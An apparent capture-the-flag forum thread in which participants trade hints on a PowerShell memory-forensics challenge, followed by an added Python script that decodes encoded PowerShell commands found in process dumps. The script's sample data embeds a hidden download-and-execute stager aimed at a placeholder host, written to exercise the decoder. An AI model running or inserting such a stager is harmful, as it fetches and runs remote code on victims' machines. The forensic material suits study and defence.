Reminiscent

Thanks!

@rotarydrone Can I PM you? I think i have it mostly solved but missing the first half of the flag.

@rotarydrone Nevermind. A reboot somehow fixed it. Got the rest.

I got the string with Base64 encoding. While decoding the string, $stP, $siP… are shown. Can anyone help me find the correct flag?

Mmm memory forensics :slight_smile:

Found a couple of malware samples and a link to resume.zip; analysis shows PowerShell calls but I can't find the flag. Is there something I am overlooking?

@FEVING said:
Found a couple of malware samples and a link to resume.zip; analysis shows PowerShell calls but I can't find the flag. Is there something I am overlooking?

Maybe dumping the PowerShell processes and searching will help?

@charybdis said:

@FEVING said:
Found a couple of malware samples and a link to resume.zip; analysis shows PowerShell calls but I can't find the flag. Is there something I am overlooking?

Maybe dumping the PowerShell processes and searching will help?

Dumping the PS process and searching leads to what @FEVING found.

First time tinkering with this type of work; it's interesting. Haven't found the flag yet. I've been reading dumps and online docs all day ~_~

Dumped the processes, dumped the memory, searched the strings, found the links, still no luck. Any help?

I think I have the file but am not able to find the flag, please help.

@roboteknix said:
I think I have the file but am not able to find the flag, please help.

PM me explaining what you did; I can give you clues.

@C3PJoe said:
Dumped the processes, dumped the memory, searched the strings, found the links, still no luck. Any help?

If you haven’t completed the challenge by now feel free to PM me.

Can anyone who has solved this challenge PM me? Found the APT .LNK file but not sure how to get the flag. Any hints?

Solved it. It's not that simple. This text helped me a lot:
https://technical.nttsecurity.com/post/102egyy/hunting-malware-with-memory-analysis
But it is still a lot of looking and trying.
It was a good challenge!
PM if hints are needed.

@deleite said:
Solved it. It's not that simple. This text helped me a lot:
https://technical.nttsecurity.com/post/102egyy/hunting-malware-with-memory-analysis
But it is still a lot of looking and trying.
It was a good challenge!
PM if hints are needed.

This was a world of help, thanks heaps.
First time doing anything like this at all. Once I figured out what was able to be seen, finding the flag took no more than 10 minutes.
Awesome challenge, learnt a lot.

@Blkph0x said:

@deleite said:
Solved it. It's not that simple. This text helped me a lot:
https://technical.nttsecurity.com/post/102egyy/hunting-malware-with-memory-analysis
But it is still a lot of looking and trying.
It was a good challenge!
PM if hints are needed.

This was a world of help, thanks heaps.
First time doing anything like this at all. Once I figured out what was able to be seen, finding the flag took no more than 10 minutes.
Awesome challenge, learnt a lot.

I'm glad it helped. Respect maybe?

Hi, I have solved this challenge. However, I am not sure what the use of the "resume.eml" file was. Happy to discuss if anyone has solved it using the .eml file?

@mendedsiren63 said:

Hi, I have solved this challenge. However, I am not sure what the use of the "resume.eml" file was. Happy to discuss if anyone has solved it using the .eml file?

The .eml is provided just as a hint to assist with the challenge or provide a starting point/things to look for.

@rotarydrone said:

@mendedsiren63 said:

Hi, I have solved this challenge. However, I am not sure what the use of the "resume.eml" file was. Happy to discuss if anyone has solved it using the .eml file?

Just a hint to assist with the challenge or provide a starting point/things to look for.

Check the link from @deleite and go step by step: is anything suspicious running on the box? What powerful Windows application do attackers use these days? Dive into that application and you will find the flag.
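The workflow the thread converges on (dump the PowerShell process, search its strings, decode the Base64 that yields things like $stP and $siP, follow the download link) as an added example, not code from the thread or from the challenge: a small Python script that takes a raw process dump such as the output of Volatility's memdump plugin, extracts ASCII and UTF-16LE strings, finds -EncodedCommand arguments, decodes them (UTF-16LE under the Base64), follows a nested FromBase64String layer and lists the URLs and string variables in the innermost script. SAMPLE_DUMP, the example.invalid URL and the stager it carries are constructed test data, and the UTF-8-unless-it-says-Unicode rule for inner layers is a heuristic assumption.

```python
"""Post-process a raw process memory dump (e.g. a Volatility memdump of a
powershell.exe process): pull printable strings, find -EncodedCommand
arguments, decode them, follow nested Base64 layers and extract URLs and
variable assignments.

Added illustration only; SAMPLE_DUMP below is constructed test data, not
the challenge image, and contains no real flag."""
import base64
import re
from typing import Dict, List, Optional

# Like the `strings` tool: runs of printable ASCII, plus UTF-16LE runs, which
# is how Windows keeps command lines and script text in process memory.
_ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
_WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc).
_ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Inner layers usually look like [Convert]::FromBase64String('...').
_NESTED = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
_URL = re.compile(r"https?://[^\s'\"()]+", re.I)
_ASSIGN = re.compile(r"(\$\w+)\s*=\s*(['\"])(.*?)\2")


def strings(blob: bytes) -> List[str]:
    """Printable ASCII and UTF-16LE strings of at least 8 characters."""
    found = [m.group().decode("ascii") for m in _ASCII_RUN.finditer(blob)]
    found += [m.group().decode("utf-16-le") for m in _WIDE_RUN.finditer(blob)]
    return found


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries the script as Base64 of UTF-16LE text."""
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def unwrap_nested(script: str, max_depth: int = 5) -> List[str]:
    """Follow FromBase64String layers; returns every layer, outermost first.

    Heuristic (assumption): if the surrounding code mentions the Unicode
    encoding, the inner bytes are UTF-16LE; otherwise treat them as UTF-8."""
    layers = [script]
    for _ in range(max_depth):
        m = _NESTED.search(layers[-1])
        if m is None:
            break
        try:
            raw = base64.b64decode(m.group(1))
        except ValueError:
            break
        wide = "unicode" in layers[-1].lower()
        layers.append(raw.decode("utf-16-le" if wide else "utf-8", "replace"))
    return layers


def extract_iocs(script: str) -> Dict[str, object]:
    """URLs and string variable assignments (the $stP/$siP style seen in the thread)."""
    return {
        "urls": sorted(set(_URL.findall(script))),
        "vars": {name: value for name, _, value in _ASSIGN.findall(script)},
    }


def hunt(blob: bytes) -> List[Dict[str, object]]:
    """Every decoded encoded-command in the dump, with its layers and IOCs."""
    hits = []
    for s in strings(blob):
        for m in _ENC_ARG.finditer(s):
            script = decode_encoded_command(m.group(1))
            if script is None:
                continue
            layers = unwrap_nested(script)
            hits.append({"encoded": m.group(1), "layers": layers,
                         "iocs": extract_iocs(layers[-1])})
    return hits


# Constructed sample (assumption): a stager that downloads a second stage,
# wrapped in one FromBase64String layer and run via -enc, stored in memory
# as a UTF-16LE command line between unrelated bytes.
INNER_SCRIPT = ("$siP = 'http://example.invalid/resume.zip'; "
                "IEX (New-Object Net.WebClient).DownloadString($siP)")
_OUTER = ("IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(INNER_SCRIPT.encode()).decode() + "')))")
_CMDLINE = "powershell.exe -NoP -W Hidden -enc " + base64.b64encode(
    _OUTER.encode("utf-16-le")).decode()
SAMPLE_DUMP = (b"\x00" * 16 + b"MZ\x90\x00\x03junk-bytes\xff\xfe"
               + _CMDLINE.encode("utf-16-le") + b"\x00\x00"
               + b"C:\\Users\\victim\\Downloads\\resume.lnk\x00")

if __name__ == "__main__":
    for hit in hunt(SAMPLE_DUMP):
        for depth, layer in enumerate(hit["layers"]):
            print(f"layer {depth}: {layer[:80]}")
        print("iocs:", hit["iocs"])
```

On a real image you would first locate the suspicious process (pslist/cmdline in Volatility), write its memory out with memdump, and feed that file to hunt(); grepping the raw dump for "http" alone misses anything still inside the Base64, which is why the decode step matters.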
